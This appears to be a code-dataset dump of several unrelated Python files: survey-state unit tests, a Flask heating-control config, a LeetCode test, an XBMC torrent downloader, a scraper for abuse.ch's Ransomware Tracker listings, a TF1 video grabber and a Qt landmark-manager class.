repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 22
values | size
stringlengths 4
7
| content
stringlengths 626
1.05M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 5.21
99.9
| line_max
int64 12
999
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
nyu-mhealth/project-smsurvey
|
main/smsurvey/tests/survey/core/services/test_survey_state_service.py
|
1
|
3788
|
import inspect
import os
import sys
import unittest
import boto3
c = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
p = os.path.dirname(c)
pp = os.path.dirname(p)
ppp = os.path.dirname(pp)
pppp = os.path.dirname(ppp)
ppppp = os.path.dirname(pppp)
sys.path.insert(0, ppppp)
from smsurvey import config
from core.model.model.survey import SurveyState, SurveyStateOperationException, SurveyStatus
class TestSurveyStateService(unittest.TestCase):
@classmethod
def setUpClass(cls):
dynamo = boto3.client('dynamodb', region_name='us-west-2', endpoint_url=config.dynamo_url)
if 'SurveyStateTest' in dynamo.list_tables()['TableNames']:
dynamo.delete_table(TableName='SurveyStateTest')
create_survey_state_cache.create_cache('SurveyStateTest')
cls.service = SurveyStateService(config.dynamo_url, 'SurveyStateTest')
def test_insert_new_survey_state(self):
survey = SurveyState.new_state_object("1", "test", "1")
self.service.insert(survey)
survey_received = self.service.get("1", "1")
self.assertTrue(survey == survey_received)
def test_insert_new_survey_state_safe_mode_off(self):
survey = SurveyState.new_state_object("1", "test", "2")
self.service.insert(survey, False)
survey_received = self.service.get("1", "2")
self.assertTrue(survey == survey_received)
def test_insert_new_survey_state_safe_mode_off_key_exists(self):
survey = SurveyState.new_state_object("1", "test", "3")
self.service.insert(survey, False)
survey_received = self.service.get("1", "3")
self.assertTrue(survey == survey_received)
def test_insert_new_survey_key_exists(self):
survey = SurveyState.new_state_object("1", "test", "4")
self.service.insert(survey)
self.assertRaises(SurveyStateOperationException, self.service.insert, survey)
def test_get_object_exists(self):
survey = SurveyState.new_state_object("2", "test", "1")
self.service.insert(survey)
survey_received = self.service.get("2", "1")
self.assertTrue(survey == survey_received)
def test_get_object_does_not_exist(self):
survey_received = self.service.get("2", "1")
self.assertIsNone(survey_received)
def test_update_object(self):
survey = SurveyState.new_state_object("3", "test", "1")
self.service.insert(survey)
survey_received = self.service.get("3", "1")
survey_received.survey_status = SurveyStatus.TERMINATED_COMPLETE
self.service.update(survey_received)
survey_received = self.service.get("3", "1")
self.assertTrue(survey_received.survey_status == SurveyStatus.TERMINATED_COMPLETE)
def test_update_object_invalid_update_different_versions(self):
survey = SurveyState.new_state_object("3", "test", "9")
self.service.insert(survey)
survey_received = self.service.get("3", "9")
survey_received.survey_state_version = 1337
self.assertRaises(SurveyStateOperationException, self.service.update, survey_received)
def test_delete_object(self):
survey = SurveyState.new_state_object(4, "test", "1")
self.service.insert(survey)
survey_received = self.service.get("4", "1")
self.assertTrue(survey == survey_received)
self.service.delete("4_1")
survey_received = self.service.get("4", "1")
self.assertIsNone(survey_received)
def test_delete_object_key_not_exist(self):
self.service.delete("4_3")
@classmethod
def tearDownClass(cls):
dynamo = boto3.client('dynamodb', region_name='us-west-2', endpoint_url=config.dynamo_url)
dynamo.delete_table(TableName='SurveyStateTest')
|
gpl-3.0
| -8,016,080,256,036,934,000 | 38.458333 | 98 | 0.671859 | false |
paulfantom/Central-Heating-webpage
|
config.py
|
1
|
3914
|
# -*- coding: UTF-8 -*-
from flask.ext.babel import lazy_gettext
import os
basedir = os.path.abspath(os.path.dirname(__file__))
MQTT_ID = 'webclient'
SERVER_IP = "127.0.0.1"
MYSQL_USER = 'mqttwarn'
MYSQL_PASS = ''
#SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://' + MYSQL_USER + ':' + MYSQL_PASS + '@localhost/mqtt_data'
BCRYPT_LOG_ROUNDS = 12
WTF_CSRF_ENABLED = True
SECRET_KEY = 'you-will-never-guess'
LANGUAGES = {
'en': 'English',
'pl': 'Polski'
}
BABEL_DEFAULT_LOCALE = 'pl'
WEEKDAYS = [lazy_gettext('Monday'),
lazy_gettext('Tuesday'),
lazy_gettext('Wednesday'),
lazy_gettext('Thursday'),
lazy_gettext('Friday'),
lazy_gettext('Saturday'),
lazy_gettext('Sunday')]
DESCRIPTIONS = {
'circulation': {
'interval' : {
'title' : lazy_gettext('Interval'),
'desc' : lazy_gettext('Set pump interval in water consumption mode'),
'range' : [1,180],
'unit' : ' min'
},
'time_on' : {
'title' : lazy_gettext('ON time'),
'desc' : lazy_gettext('Set pump mixing time in water consumption mode'),
'range' : [1,300],
'unit' : ' s'
}},
'heater' : {
'expected': {
'title' : lazy_gettext('Expected room temperature'),
'desc' : lazy_gettext('Override scheduled room temperature for 60 minutes'),
'range' : [15,28],
'step' : 0.1,
'unit' : u'°C'
},
'critical' : {
'title' : lazy_gettext('Critical'),
'desc' : lazy_gettext('Set heater critical temperature'),
'range' : [40,100],
'step' : 1,
'unit' : u'°C'
},
'hysteresis' : {
'title' : lazy_gettext('Hysteresis'),
'desc' : lazy_gettext('Set heater hysteresis for central heating'),
'range' : [0,2],
'step' : 0.01,
'unit' : u'°C'
}},
'solar': {
'temp_off' : {
'title' : lazy_gettext('Temperature difference (OFF)'),
'desc' : lazy_gettext('Temperature difference needed to stop solar system'),
'range' : [0.1,15],
'step' : 0.1,
'unit' : u'°C'
},
'temp_on' : {
'title' : lazy_gettext('Temperature difference (ON)'),
'desc' : lazy_gettext('Temperature difference needed to start solar system'),
'range' : [0.1,15],
'step' : 0.1,
'unit' : u'°C'
},
'critical' : {
'title' : lazy_gettext('Critical temperature'),
'desc' : lazy_gettext('Temperature of solar system turning off'),
'range' : [80,200],
'unit' : u'°C'
}},
'tank' : {
'solar_max' : {
'title' : lazy_gettext('Solar'),
'desc' : lazy_gettext('DHW maximum temperature with solar system usage'),
'range' : [30,100],
'unit' : u'°C'
},
'heater_max' : {
'title' : lazy_gettext('Heater (max)'),
'desc' : lazy_gettext('DHW maximum temperature with heater system usage'),
'range' : [30,90],
'unit' : u'°C'
},
'heater_min' : {
'title' : lazy_gettext('Heater (min)'),
'desc' : lazy_gettext('DHW minimum temperature with heater system usage'),
'range' : [20,60],
'unit' : u'°C'
}},
'schedule' : {
'override_temp': {
'title' : lazy_gettext('Room temperature'),
'desc' : lazy_gettext('Override scheduled room temperature for 1 hour'),
'range' : [15,28],
'step' : 0.1,
'unit' : u'°C'
}}
}
|
mpl-2.0
| 8,347,552,832,554,916,000 | 31.806723 | 101 | 0.478484 | false |
BigEgg/LeetCode
|
Python/LeetCode.Test/_001_050/Test_040_CombinationSum2.py
|
1
|
1220
|
import unittest
import pytest
import sys
sys.path.append('LeetCode/_001_050')
sys.path.append('LeetCode.Test')
from _040_CombinationSum2 import Solution
import AssertHelper
class Test_040_CombinationSum2(unittest.TestCase):
@pytest.mark.timeout(1)
def test_combinationSum2_1(self):
candidates = [10,1,2,7,6,1,5]
target = 8
solution = Solution()
AssertHelper.assertArray([ [1, 1, 6], [1, 2, 5], [1, 7], [2, 6] ], solution.combinationSum2(candidates, target))
@pytest.mark.timeout(1)
def test_combinationSum2_2(self):
candidates = [2,5,2,1,2]
target = 5
solution = Solution()
AssertHelper.assertArray([ [1,2,2], [5] ], solution.combinationSum2(candidates, target))
@pytest.mark.timeout(1)
def test_combinationSum2_notExist(self):
candidates = [3,6,7]
target = 5
solution = Solution()
AssertHelper.assertArray([], solution.combinationSum2(candidates, target))
@pytest.mark.timeout(1)
def test_combinationSum2_emptyCandidates(self):
candidates = []
target = 5
solution = Solution()
AssertHelper.assertArray([], solution.combinationSum2(candidates, target))
|
mit
| 3,079,392,301,025,578,000 | 30.282051 | 120 | 0.651639 | false |
DiMartinoX/plugin.video.kinopoisk.ru
|
patch_for_plugin.video.torrenter_ver_1.2.7/Downloader.py
|
1
|
14030
|
#-*- coding: utf-8 -*-
'''
Torrenter plugin for XBMC
Copyright (C) 2012 Vadim Skorba
vadim.skorba@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import time
import thread
import os
import urllib2
import hashlib
import re
import xbmc
import xbmcgui
import xbmcvfs
import Localization
class Torrent:
torrentFile = None
magnetLink = None
storageDirectory = ''
torrentFilesDirectory = 'torrents'
startPart = 0
endPart = 0
partOffset = 0
torrentHandle = None
session = None
downloadThread = None
threadComplete = False
lt = None
def __init__(self, storageDirectory = '', torrentFile = '', torrentFilesDirectory = 'torrents'):
#http://www.rasterbar.com/products/libtorrent/manual.html
'''try:
import platform
if 'Linux' == platform.system():
if 'x86_64' == platform.machine():
from python_libtorrent.linux_x86_64 import libtorrent
else:
from python_libtorrent.linux_x86 import libtorrent
else:
from python_libtorrent.windows import libtorrent
except ImportError, v:
try:
import libtorrent
except ImportError, v:
raise ImportError("The script.module.libtorrent module is not installed, libtorrent not found or unsupported system used")'''
try:
from python_libtorrent.linux_x86_64 import libtorrent
except:
pass
try:
from python_libtorrent.linux_x86 import libtorrent
except:
pass
try:
from python_libtorrent.windows import libtorrent
except:
pass
try:
import libtorrent
except:
pass
'''except ImportError, v:
raise ImportError("The script.module.libtorrent module is not installed, libtorrent not found or unsupported system used")'''
self.lt = libtorrent
del libtorrent
self.torrentFilesDirectory = torrentFilesDirectory
self.storageDirectory = storageDirectory
if not xbmcvfs.exists(self.storageDirectory + os.sep + self.torrentFilesDirectory):
self._makedirs(self.storageDirectory + os.sep + self.torrentFilesDirectory)
if xbmcvfs.exists(torrentFile):
self.torrentFile = torrentFile
self.torrentFileInfo = self.lt.torrent_info(self.torrentFile)
elif re.match("^magnet\:.+$", torrentFile):
self.magnetLink = torrentFile
def saveTorrent(self, torrentUrl):
if re.match("^magnet\:.+$", torrentUrl):
self.magnetLink = torrentUrl
self.magnetToTorrent(torrentUrl)
return self.magnetLink
else:
torrentFile = self.storageDirectory + os.sep + self.torrentFilesDirectory + os.sep + self.md5(torrentUrl) + '.torrent'
try:
request = urllib2.Request(torrentUrl)
request.add_header('Referer', torrentUrl)
localFile = open(torrentFile, "w+b")
result = urllib2.urlopen(request)
localFile.write(result.read())
localFile.close()
except:
print 'Unable to save torrent file from "' + torrentUrl + '" to "' + torrentFile + '" in Torrent::saveTorrent'
return
if xbmcvfs.exists(torrentFile):
try:
self.torrentFileInfo = self.lt.torrent_info(torrentFile)
except:
xbmcvfs.delete(torrentFile)
return
baseName = os.path.basename(self.getFilePath())
newFile = self.storageDirectory + os.sep + self.torrentFilesDirectory + os.sep + baseName + '.' + self.md5(torrentUrl) + '.torrent'
try:newFile.decode('utf-8', 'ignore').encode('ascii', 'ignore')
except:newFile = newFile.encode('ascii', 'ignore')
try:xbmcvfs.delete(newFile)
except:pass
if not xbmcvfs.exists(newFile):
try:
xbmcvfs.rename(torrentFile, newFile)
except:
print 'Unable to rename torrent file from "' + torrentFile + '" to "' + newFile + '" in Torrent::renameTorrent'
return
self.torrentFile = newFile
self.torrentFileInfo = self.lt.torrent_info(self.torrentFile)
return self.torrentFile
def getMagnetInfo(self):
magnetSettings = {
'save_path': self.storageDirectory,
'storage_mode': self.lt.storage_mode_t(2),
'paused': True,
'auto_managed': True,
'duplicate_is_error': True
}
progressBar = xbmcgui.DialogProgress()
progressBar.create(Localization.localize('Please Wait'), Localization.localize('Magnet-link is converting.'))
self.torrentHandle = self.lt.add_magnet_uri(self.session, self.magnetLink, magnetSettings)
iterator = 0
while not self.torrentHandle.has_metadata():
time.sleep(0.1)
progressBar.update(iterator)
iterator += 1
if iterator == 100:
iterator = 0
if progressBar.iscanceled():
progressBar.update(0)
progressBar.close()
return
progressBar.update(0)
progressBar.close()
return self.torrentHandle.get_torrent_info()
def magnetToTorrent(self, magnet):
self.magnetLink = magnet
self.initSession()
torrentInfo = self.getMagnetInfo()
try:
torrentFile = self.lt.create_torrent(torrentInfo)
baseName = os.path.basename(self.storageDirectory + os.sep + torrentInfo.files()[0].path).decode('utf-8').encode('ascii', 'ignore')
self.torrentFile = self.storageDirectory + os.sep + self.torrentFilesDirectory + os.sep + baseName + '.torrent'
torentFileHandler = open(self.torrentFile, "wb")
torentFileHandler.write(self.lt.bencode(torrentFile.generate()))
torentFileHandler.close()
self.torrentFileInfo = self.lt.torrent_info(self.torrentFile)
except:
xbmc.executebuiltin("Notification(%s, %s, 7500)" % (Localization.localize('Error'), Localization.localize('Your library out of date and can\'t save magnet-links.')))
self.torrentFileInfo = torrentInfo
def getUploadRate(self):
if None == self.torrentHandle:
return 0
else:
return self.torrentHandle.status().upload_payload_rate
def getDownloadRate(self):
if None == self.torrentHandle:
return 0
else:
return self.torrentHandle.status().download_payload_rate
def getPeers(self):
if None == self.torrentHandle:
return 0
else:
return self.torrentHandle.status().num_peers
def getSeeds(self):
if None == self.torrentHandle:
return 0
else:
return self.torrentHandle.status().num_seeds
def getFileSize(self, contentId = 0):
return self.getContentList()[contentId].size
def getFilePath(self, contentId = 0):
return self.storageDirectory + os.sep + self.getContentList()[contentId].path.decode('utf8')
def getContentList(self):
return self.torrentFileInfo.files()
def setUploadLimit(self, bytesPerSecond):
self.session.set_upload_rate_limit(int(bytesPerSecond))
def setDownloadLimit(self, bytesPerSecond):
self.session.set_download_rate_limit(int(bytesPerSecond))
def md5(self, string):
hasher = hashlib.md5()
try:hasher.update(string)
except:hasher.update(string.encode('utf-8','ignore'))
return hasher.hexdigest()
def downloadProcess(self, contentId):
for part in range(self.startPart, self.endPart + 1):
self.getPiece(part)
time.sleep(0.1)
self.checkThread()
self.threadComplete = True
def initSession(self):
try:
self.session.remove_torrent(self.torrentHandle)
except:
pass
self.session = self.lt.session()
self.session.start_dht()
self.session.add_dht_router("router.bittorrent.com", 6881)
self.session.add_dht_router("router.utorrent.com", 6881)
self.session.add_dht_router("router.bitcomet.com", 6881)
self.session.listen_on(6881, 6891)
self.session.set_alert_mask(self.lt.alert.category_t.storage_notification)
def startSession(self, contentId = 0, seeding = True):
self.initSession()
if None == self.magnetLink:
self.torrentHandle = self.session.add_torrent({'ti': self.torrentFileInfo, 'save_path': self.storageDirectory})
else:
self.torrentFileInfo = self.getMagnetInfo()
selectedFileInfo = self.getContentList()[contentId]
self.partOffset = 50 * 1024 * 1024 / self.torrentFileInfo.piece_length()#50 MB
#print 'partOffset ' + str(self.partOffset)
self.startPart = selectedFileInfo.offset / self.torrentFileInfo.piece_length()
self.endPart = (selectedFileInfo.offset + selectedFileInfo.size) / self.torrentFileInfo.piece_length()
for i in range(self.torrentFileInfo.num_pieces()):
self.torrentHandle.piece_priority(i, 0)
for i in range(self.startPart, self.startPart + self.partOffset):
if i <= self.endPart:
self.torrentHandle.piece_priority(i, 7)
self.torrentHandle.piece_priority(self.endPart, 7)
self.torrentHandle.set_sequential_download(True)
thread.start_new_thread(self.downloadProcess, (contentId,))
if seeding:# and None == self.magnetLink:
thread.start_new_thread(self.addToSeeding, ())
def addToSeeding(self):
for filename in os.listdir(self.storageDirectory + os.sep + self.torrentFilesDirectory):
currentFile = self.storageDirectory + os.sep + self.torrentFilesDirectory + os.sep + filename
if re.match('^.+\.torrent$', currentFile):
info = self.lt.torrent_info(currentFile)
fileSettings = {
'ti': info,
'save_path': self.storageDirectory,
'paused': False,
'auto_managed': False,
'seed_mode': True,
}
self.session.add_torrent(fileSettings)
def fetchSeekBytes(self, bytes):
seekPartsOffset = self.startPart + bytes / self.torrentFileInfo.piece_length()
priorities = self.torrentHandle.piece_priorities()
status = self.torrentHandle.status()
if len(status.pieces) == 0:
return
if status.pieces[seekPartsOffset] == False:
self.checkThread()
self.torrentHandle.piece_priority(seekPartsOffset, 7)
def fetchParts(self):
priorities = self.torrentHandle.piece_priorities()
status = self.torrentHandle.status()
downloading = 0
#print priorities
if len(status.pieces) == 0:
return
for part in range(self.startPart, self.endPart + 1):
if priorities[part] != 0 and status.pieces[part] == False:
self.checkThread()
downloading += 1
for part in range(self.startPart, self.endPart + 1):
if priorities[part] == 0 and downloading < self.partOffset:
self.checkThread()
self.torrentHandle.piece_priority(part, 1)
downloading += 1
for part in range(self.startPart, self.endPart + 1):
if priorities[part] != 0 and status.pieces[part] == False:
self.checkThread()
break
def checkThread(self):
if self.threadComplete == True:
self.session.remove_torrent(self.torrentHandle)
thread.exit()
def getPiece(self, index):
cache = {}
if index in cache:
result = cache[index]
cache[index] = 0
return result
while True:
status = self.torrentHandle.status()
if len(status.pieces) == 0:
break
if status.pieces[index] == True:
break
time.sleep(0.5)
self.checkThread()
self.torrentHandle.read_piece(index)
while True:
part = self.session.pop_alert()
if isinstance(part, self.lt.read_piece_alert):
if part.piece == index:
return part.buffer
else:
cache[part.piece] = part.buffer
break
time.sleep(0.5)
self.checkThread()
def _makedirs(self, _path):
success = False
if (xbmcvfs.exists(_path)):
return True
# temp path
tmppath = _path
# loop thru and create each folder
while (not xbmcvfs.exists(tmppath)):
success = xbmcvfs.mkdir(tmppath)
if not success:
tmppath = os.path.dirname(tmppath)
# call function until path exists
self._makedirs(_path)
|
gpl-3.0
| 6,123,942,873,642,952,000 | 39.085714 | 177 | 0.595795 | false |
PaulSec/ransomware-tracker
|
ransomwaretracker/ransomwareTrackerAPI.py
|
1
|
5215
|
"""
This is the (unofficial) Python API for http://ransomwaretracker.abuse.ch/tracker/ Website.
"""
from __future__ import print_function
from bs4 import BeautifulSoup
from enum import Enum
import requests
import sys
import json
class Threat(Enum):
def __str__(self):
return str(self.value)
c2 = 'c2',
payment_sites = 'payment-sites',
distribution_sites = 'distribution-sites'
class Malware(Enum):
def __str__(self):
return str(self.value)
TeslaCrypt = 'teslacrypt',
CryptoWall = 'cryptowall',
TorrentLocker = 'torrentlocker',
PadCrypt = 'padcrypt',
Locky = 'locky',
CTB_Locker = 'ctb-locker',
FAKBEN = 'fakben',
PayCrypt = 'paycrypt',
DMALocker = 'dmalocker',
Cerber = 'cerber'
class RansomwareTracker(object):
"""RansomwareTracker Main Handler"""
_base_url = 'http://ransomwaretracker.abuse.ch/tracker/'
def __init__(self, verbose=False):
self.verbose = verbose
def display_message(self, s):
if self.verbose:
print('[verbose] %s' % s)
def extract_info_host(self, soup):
res = {}
res['host_information'] = {}
table_host = soup.find('table', attrs={'class': 'tablehost'})
for index, tr in enumerate(table_host.findAll('tr')):
if index == 5:
res['host_information']['blacklist_check'] = {}
try:
res['host_information']['blacklist_check']['Spamhaus_DBL'] = tr.find('a')['href']
except:
res['host_information']['blacklist_check']['Spamhaus_DBL'] = 'not_listed'
elif index == 6:
try:
res['host_information']['blacklist_check']['SURBL'] = tr.find('a')['href']
except:
res['host_information']['blacklist_check']['SURBL'] = 'not_listed'
else:
res['host_information'][tr.find('th').text[:-1].replace(' ', '_')] = tr.find('td').text
table_host = soup.find('table', attrs={'class': 'maintable'})
res['results'] = []
for tr in table_host.findAll('tr')[1:]:
tds = tr.findAll('td')
tmp_res = {
'active': tds[0].text,
'first_seen': tds[1].text,
'last_seen': tds[2].text,
'ip_address': tds[3].find('a').contents[0],
'hostname': tds[4].text,
'SBL': tds[5].text,
'as_number': tds[6].text,
'as_name': tds[7].text,
'country': tds[8].text
}
res['results'].append(tmp_res)
return res
def host(self, host):
# p27dokhpz2n7nvgr.15jznv.top
url = 'http://ransomwaretracker.abuse.ch/host/{}/'.format(host)
req = requests.get(url)
soup = BeautifulSoup(req.content, 'html.parser')
if req.status_code != 200:
print(
u"Unexpected status code from {url}: {code}".format(
url=sslbl_url, code=req.status_code),
file=sys.stderr,
)
return []
soup = BeautifulSoup(req.content, 'html.parser')
return json.dumps(self.extract_info_host(soup))
def extract_info_table(self, table):
res = {}
res['matches'] = []
trs = table.findAll('tr')
for tr in trs[1:]:
tds = tr.findAll('td')
data = {
'date_added': tds[0].text,
'threat': tds[1].text,
'malware': tds[2].text,
'host': tds[3].find('a').contents[0],
'domain_registrar': tds[4].text,
'ip_adress': tds[5].text
}
res['matches'].append(data)
res['total'] = len(res['matches'])
return res
def retrieve_results(self, page=0, filter_with=None):
sslbl_url = self._base_url
if filter_with is not None:
sslbl_url += filter_with[0]
if page != 0:
sslbl_url += 'page/{}'.format(page)
req = requests.get(sslbl_url)
soup = BeautifulSoup(req.content, 'html.parser')
if req.status_code != 200:
print(
u"Unexpected status code from {url}: {code}".format(
url=sslbl_url, code=req.status_code),
file=sys.stderr)
return []
soup = BeautifulSoup(req.content, 'html.parser')
table = soup.findAll('table', attrs={'class': 'maintable'})[0]
return json.dumps(self.extract_info_table(table))
def search(self, s):
sslbl_url = self._base_url + '?search={}'.format(s)
req = requests.get(sslbl_url)
soup = BeautifulSoup(req.content, 'html.parser')
if req.status_code != 200:
print(
u"Unexpected status code from {url}: {code}".format(
url=sslbl_url, code=req.status_code),
file=sys.stderr)
return []
soup = BeautifulSoup(req.content, 'html.parser')
table = soup.findAll('table', attrs={'class': 'maintable'})[0]
return json.dumps(self.extract_info_table(table))
|
mit
| -3,121,349,289,463,922,700 | 31.391304 | 103 | 0.521189 | false |
audetto/andsoft
|
python/rai/asi/TF1.py
|
1
|
4335
|
import os
import datetime
import json
from asi import Utils
from asi import Config
from asi import Base
programsUrl = "http://api.tf1.fr/tf1-programs/iphone/limit/100/"
newsUrl = "http://api.tf1.fr/tf1-homepage-news/iphone/"
homepageUrl = "http://api.tf1.fr/tf1-homepage/iphone/"
def getDataUrl(progId, item):
url = "http://api.tf1.fr/tf1-vods/iphone//integral/{0}/program_id/{1}".format(item, progId)
return url
def getWatLink(watId):
url = "http://www.wat.tv/get/iphone/{0}.m3u8?bwmin=100000&bwmax=490000".format(watId)
return url
def parseItem(grabber, prog, name, db):
pid = str(prog["id"])
desc = prog["longTitle"]
pubDate = prog["publicationDate"]
duration = prog["duration"]
name = name + " - " + prog["shortTitle"]
wat = prog["watId"]
category = prog["videoCategory"]
length = datetime.timedelta(seconds = duration)
date = datetime.datetime.strptime(pubDate, "%Y-%m-%d %H:%M:%S")
# ignore the countless "extract", "bonus", "short" which last just a few minutes
if category == "fullvideo":
pid = Utils.getNewPID(db, pid)
p = Program(grabber, date, length, pid, name, desc, wat, category)
Utils.addToDB(db, p)
def processGroup(grabber, f, name, db):
o = json.load(f)
for prog in o:
parseItem(grabber, prog, name, db)
def processNews(grabber, f, folder, progress, downType, db):
o = json.load(f)
for prog in o:
name = prog["programName"]
groupId = prog["programId"]
downloadGroup(grabber, name, groupId, folder, progress, downType, db)
# this group contains the info of the most recent Item
# we add an other item with the group name
# some info will still be missing
title = prog["title"]
wat = prog["linkAttributes"]["watId"]
category = prog["linkAttributes"]["videoCategory"]
pid = Utils.getNewPID(db, groupId)
p = Program(grabber, datetime.datetime.now(), None, pid, name, title, wat, category)
Utils.addToDB(db, p)
def processPrograms(grabber, f, folder, progress, downType, db):
o = json.load(f)
for prog in o:
name = prog["shortTitle"]
groupId = prog["id"]
# here, we do not know the most recent item
# we simply have to go through them all
downloadGroup(grabber, name, groupId, folder, progress, downType, db)
def downloadGroup(grabber, name, groupId, folder, progress, downType, db):
# we set it to True as this is a group
# and subject to continuous changes
checkTimestamp = True
# .0
url_0 = getDataUrl(groupId, 0)
localName_0 = os.path.join(folder, str(groupId) + ".0.json")
f_0 = Utils.download(grabber, progress, url_0, localName_0, downType, "utf-8", checkTimestamp)
if f_0:
processGroup(grabber, f_0, name, db)
# .1
url_1 = getDataUrl(groupId, 1)
localName_1 = os.path.join(folder, str(groupId) + ".1.json")
f_1 = Utils.download(grabber, progress, url_1, localName_1, downType, "utf-8", checkTimestamp)
if f_1:
processGroup(grabber, f_1, name, db)
def download(db, grabber, downType):
progress = Utils.getProgress()
folder = Config.tf1Folder
localName = os.path.join(folder, "news.json")
f = Utils.download(grabber, progress, newsUrl, localName, downType, "utf-8", True)
processNews(grabber, f, folder, progress, downType, db)
localName = os.path.join(folder, "programs.json")
f = Utils.download(grabber, progress, programsUrl, localName, downType, "utf-8", True)
processPrograms(grabber, f, folder, progress, downType, db)
class Program(Base.Base):
def __init__(self, grabber, datetime, length, pid, title, desc, wat, category):
super(Program, self).__init__()
self.pid = pid
self.title = title
self.description = desc
self.channel = "tf1"
self.wat = wat
self.datetime = datetime
self.category = category
self.length = length
self.grabber = grabber
self.ts = getWatLink(self.wat)
name = Utils.makeFilename(self.title)
self.filename = self.pid + "-" + name
def display(self, width):
super(Program, self).display(width)
print()
print("Category:", self.category)
|
gpl-3.0
| 6,046,164,574,876,514,000 | 28.489796 | 98 | 0.633679 | false |
mtils/ems
|
ems/qt4/location/landmarks/landmarkmanagerengine.py
|
1
|
53932
|
'''
Created on 28.10.2011
@author: michi
'''
from PyQt4.QtCore import QObject, Qt, QVariant, pyqtSignal, QMutexLocker,\
QString
from landmarkfilter import LandmarkFilter #@UnresolvedImport
from landmarkmanager import LandmarkManager #@UnresolvedImport
from landmark import Landmark #@UnresolvedImport
from landmarkcategory import LandmarkCategory #@UnresolvedImport
from ems.qt4.location.landmarks.landmarksortorder import LandmarkSortOrder #@UnresolvedImport
from landmarkattributefilter import LandmarkAttributeFilter #@UnresolvedImport
from landmarkboxfilter import LandmarkBoxFilter #@UnresolvedImport
from landmarkcategoryfilter import LandmarkCategoryFilter #@UnresolvedImport
from landmarkintersectionfilter import LandmarkIntersectionFilter #@UnresolvedImport
from landmarkidfilter import LandmarkIdFilter #@UnresolvedImport
from landmarknamefilter import LandmarkNameFilter #@UnresolvedImport
def matchString(sourceStr, matchStr, matchFlags):
'''
@param sourceStr: The source
@type sourceStr: str
@param matchStr: The matching string (if)
@type matchStr: str
@param matchFlags: LandmarkFilter.MatchFlags "Enum"
@type matchFlags: int
@rtype: bool
'''
if not (matchFlags & LandmarkFilter.MatchCaseSensitive):
sourceStr = sourceStr.lower()
matchStr = matchStr.lower()
if (matchFlags & 3) == LandmarkFilter.MatchEndsWith:
return sourceStr.endswith(matchStr)
elif (matchFlags & 3) == LandmarkFilter.MatchStartsWith:
return sourceStr.startswith(matchStr)
elif (matchFlags & 3) == LandmarkFilter.MatchContains:
return (sourceStr.find(matchStr) != -1)
else:
return (sourceStr == matchStr)
def getLandmarkAttribute(key, landmark):
'''
@param key: The attribute name
@type key: str
@param landmark: Landmark
@type landmark: Landmark
@rtype: QVariant
'''
if key == "name":
return landmark.name();
elif key == "description":
return landmark.description();
elif key == "countryCode":
return landmark.address().countryCode();
elif key == "country":
return landmark.address().country();
elif key == "state":
return landmark.address().state();
elif key == "city":
return landmark.address().city();
elif key == "district":
return landmark.address().district();
elif key == "district":
return landmark.address().district();
elif key == "street":
return landmark.address().street();
elif key == "postcode":
return landmark.address().postcode();
elif key == "phoneNumber":
return landmark.phoneNumber();
else:
return QVariant(); # shouldn't be possible
commonLandmarkKeys = ("name", "description", "countryCode", "country", "state",
"county", "city", "district", "street", "postcode",
"phoneNumber")
class LandmarkManagerEngine(QObject):
'''
\brief The QLandmarkManagerEngine class provides the interface for all implementations
of the landmark manager backend functionality.
Instances of this class are usually provided by \l QLandmarkManagerEngineFactory, which is loaded
from a plugin.
'''
dataChanged = pyqtSignal()
'''This signal is emitted some time after changes occur to the datastore managed by this
engine, and the engine is unable to precisely determine which changes occurred, or if the
engine considers the changes to be radical enough to require clients to reload all data.
If this signal is emitted, no other signals may be emitted for the associated changes.
As it is possible that other processes (or other devices) may have caused the
changes, the timing can not be determined.'''
landmarksAdded = pyqtSignal(list)
'''This signal is emitted some time after a set of landmarks has been added to
the datastore managed by the engine and where the \l dataChanged() signal was not emitted for those changes.
As it is possible that other processes(or other devices) may
have added the landmarks, the exact timing cannot be determined.
There may be one or more landmark identifiers in the \a landmarkIds list.'''
landmarksChanged = pyqtSignal(list)
'''This signal is emitted some time after a set of landmarks have been modified in
the datastore managed by this engine and where the \l dataChanged() signal was not emitted for those changes.
As it is possible that other processes(or other devices) may have modified the landmarks,
the timing cannot be determined.
Note that removal of a category will not trigger a \c landmarksChanged signal for landmarks belonging to that category.
There may be one ore more landmark identifiers in the \a landmarkIds list.'''
landmarksRemoved = pyqtSignal(list)
'''This signal is emitted some time after a set of landmarks have been removed from the
datastore managed by this engine and where the \l dataChanged() signal was not emitted for those changes.
As it is possible that other processes(or other devices) may have removed the landmarks,
the timing cannot be determined.
There may be one ore more landmark identifiers in the \a landmarkIds list.'''
categoriesAdded = pyqtSignal(list)
'''This signal is emitted some time after a set of categories has been added to the datastore
managed by this engine and where the \l dataChanged() signal was not emitted for those changes.
As it is possible that other processes(or other devices) may
have added the landmarks, the exact timing cannot be determined.
There may be one or more category identifiers in the \a categoryIds list.'''
categoriesChanged = pyqtSignal(list)
'''This signal is emitted some time after a set of categories have been modified in the datastore
managed by the engine and where the \l dataChanged() signal was not emitted for those changes.
As it is possible that other processes(or other devices) may have modified the categories,
the timing cannot be determined.
There may be one ore more category identifiers in the \a categoryIds list.'''
categoriesRemoved = pyqtSignal(list)
'''This signal is emitted some time after a set of categories have been removed from the datastore
managed by this engine and where the \l dataChanged() signal was not emitted for those changes.
As it is possible that other processes(or other devices) may have removed the categories,
the timing cannot be determined.
There may be one ore more category identifiers in the \a categoryIds list.'''
def __init__(self):
QObject.__init__(self, None)
def managerName(self):
'''
Returns the manager name for this QLandmarkManagerEngine
@rtype: str
'''
return "base"
def managerParameters(self):
'''
Returns the parameters with which this engine was constructed. Note that
the engine may have discarded unused or invalid parameters at the time of
construction, and these will not be returned.
@rtype: dict
'''
return {}
